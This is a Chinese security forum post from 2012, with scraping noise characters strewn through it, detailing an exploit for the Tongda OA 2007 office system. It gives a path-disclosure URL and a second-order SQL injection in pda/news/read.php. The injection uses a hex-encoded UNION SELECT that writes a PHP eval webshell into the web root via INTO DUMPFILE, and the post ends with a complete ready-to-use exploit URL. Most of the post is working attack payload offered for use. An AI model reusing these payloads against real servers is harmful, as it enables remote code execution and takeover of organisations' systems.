找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2552|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
4 R6 s5 c% s; l" u; E) }+ g0 F
4 e6 l' M4 [. K6 S
, i0 c, W! A6 r- |Office Anywhere 2007 网络智能办公系统
, ~& d$ ~( J$ z- P* f% g& {
, M. g+ B) G4 C* M2 `; `6 D" m: dhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..& l) {$ \: E' w( O# T2 m9 |

0 G6 _/ g- n9 @   g1 z" V' ?7 q8 C- n$ e' j9 u
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的7 k3 N: ~; A. d4 e
) f2 Y2 `/ B, ^% r
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
4 m/ Y3 ^5 b0 k: ?9 i$ \3 ~其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了3 h1 K. p0 B1 @* z! G- h4 S4 f+ S
0 Z6 ]4 |" Y2 ^2 X
这个时候我们是不是可以组合起来使用哪?+ Z) f4 n; c/ ?4 L  B
" F/ s+ v* d( x( f0 s" J0 _
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样& l- T8 g5 x8 J. Z' G
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
4 Y4 Q+ P+ V1 \/ G5 T% I
8 z) x0 _& B/ \5 x5 d这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
- y) @3 g2 Z- \7 i# _3 |: L' x5 U
; h1 j# f# N% x- z那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
1 d0 w5 t/ t  P # |% z& e9 K2 n4 l) Y5 p
那么我们用字符串格式带入进行hex编码6 w8 @5 @" B' N2 O6 F; o
, N, f, D+ X9 R+ y0 `2 _& F  N# _6 B
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
' R7 a6 M2 m" W3 i$ h 0 _9 A- ~+ E+ z; s- @) u: C0 c! K
测试ok,获取oa的webshell; M2 ]1 d/ ~% c: R4 o2 d- H! l7 d
. n5 r* D; U! ]" ^2 G; T

) D! W! j5 o# s9 P6 Upda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
4 q( D' W8 a' s6 n( Z5 f5 Y直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表